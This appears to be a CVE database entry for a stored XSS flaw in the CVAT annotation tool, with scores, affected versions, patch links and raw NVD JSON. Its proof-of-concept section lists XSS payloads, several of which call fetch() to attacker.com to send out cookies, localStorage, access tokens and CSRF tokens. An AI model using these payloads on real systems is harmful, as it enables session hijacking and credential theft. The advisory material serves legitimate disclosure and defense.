Security Vulnerability Report
CVE-2026-23516 CVSS 5.4 MEDIUM

CVE-2026-23516

Published: 2026-01-21 22:15:50
Last Modified: 2026-02-20 20:08:07

Description

CVAT is an open source interactive video and image annotation tool for computer vision. In versions 2.2.0 through 2.54.0, an attacker is able to execute arbitrary JavaScript in a victim user's CVAT UI session, provided that they are able to create a maliciously crafted label in a CVAT task or project, then get the victim user to either edit that label, or view a shape that refers to that label; and/or get the victim user to upload a maliciously crafted SVG image when configuring a skeleton. This gives the attacker temporary access to all CVAT resources that the victim user can access. Version 2.55.0 fixes the issue.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:cvat:computer_vision_annotation_tool:*:*:*:*:*:*:*:* - VULNERABLE
CVAT 2.2.0 through 2.54.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-23516 stored XSS PoC

// Attack scenario 1: malicious label name
// Use the following payload as the label name when creating a label:
const maliciousLabel = `<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">`;

// Attack scenario 2: malicious SVG file
const maliciousSVG = `
<svg xmlns="http://www.w3.org/2000/svg">
  <script>alert(document.cookie)</script>
  <rect width="100" height="100" fill="red"/>
</svg>`;

// Attack scenario 3: event handler
const eventBasedPayload = `
<svg xmlns="http://www.w3.org/2000/svg">
  <body onload="fetch('https://attacker.com/exfil?data='+btoa(JSON.stringify(localStorage)))">
    <rect width="100" height="100" fill="blue"/>
  </body>
</svg>`;

// Attack scenario 4: JavaScript URI
const jsUriPayload = `<a href="javascript:fetch('https://attacker.com/steal?token='+localStorage.getItem('access_token'))">Click me</a>`;

// Attack scenario 5: data exfiltration example
const exfiltrationScript = `
<script>
  // Get the CSRF token
  const csrfToken = document.querySelector('[name=csrfmiddlewaretoken]')?.value;
  // Collect sensitive information
  const sensitiveData = {
    cookies: document.cookie,
    localStorage: {...localStorage},
    sessionStorage: {...sessionStorage},
    csrfToken: csrfToken
  };
  // Send the data out
  fetch('https://attacker.com/api/collect', {
    method: 'POST',
    body: JSON.stringify(sensitiveData),
    headers: {'Content-Type': 'application/json'}
  });
</script>`;

References

https://github.com/cvat-ai/cvat/commit/40800707fe39e3ff76c8d036eb953eb12d764e70 (Patch)
https://github.com/cvat-ai/cvat/security/advisories/GHSA-3m7p-wx65-c7mp (Patch, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23516", "sourceIdentifier": "[email protected]", "published": "2026-01-21T22:15:49.850", "lastModified": "2026-02-20T20:08:06.990", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CVAT is an open source interactive video and image annotation tool for computer vision. In versions 2.2.0 through 2.54.0, an attacker is able to execute arbitrary JavaScript in a victim user's CVAT UI session, provided that they are able to create a maliciously crafted label in a CVAT task or project, then get the victim user to either edit that label, or view a shape that refers to that label; and/or get the victim user to upload a maliciously crafted SVG image when configuring a skeleton. This gives the attacker temporary access to all CVAT resources that the victim user can access. Version 2.55.0 fixes the issue."}, {"lang": "es", "value": "CVAT es una herramienta de anotación de video e imagen interactiva de código abierto para visión artificial. En las versiones 2.2.0 a la 2.54.0, un atacante es capaz de ejecutar JavaScript arbitrario en la sesión de la interfaz de usuario de CVAT de un usuario víctima, siempre que sea capaz de crear una etiqueta creada maliciosamente en una tarea o proyecto de CVAT, luego lograr que el usuario víctima edite esa etiqueta, o vea una forma que se refiera a esa etiqueta; y/o lograr que el usuario víctima cargue una imagen SVG creada maliciosamente al configurar un esqueleto. Esto le da al atacante acceso temporal a todos los recursos de CVAT a los que el usuario víctima puede acceder. La versión 2.55.0 corrige el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-83"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cvat:computer_vision_annotation_tool:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.2.0", "versionEndExcluding": "2.55.0", "matchCriteriaId": "4152356D-0D27-449D-A709-A15F7FD1665E"}]}]}], "references": [{"url": "https://github.com/cvat-ai/cvat/commit/40800707fe39e3ff76c8d036eb953eb12d764e70", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/cvat-ai/cvat/security/advisories/GHSA-3m7p-wx65-c7mp", "source": "[email protected]", "tags": ["Patch", "Third Party Advisory"]}]}}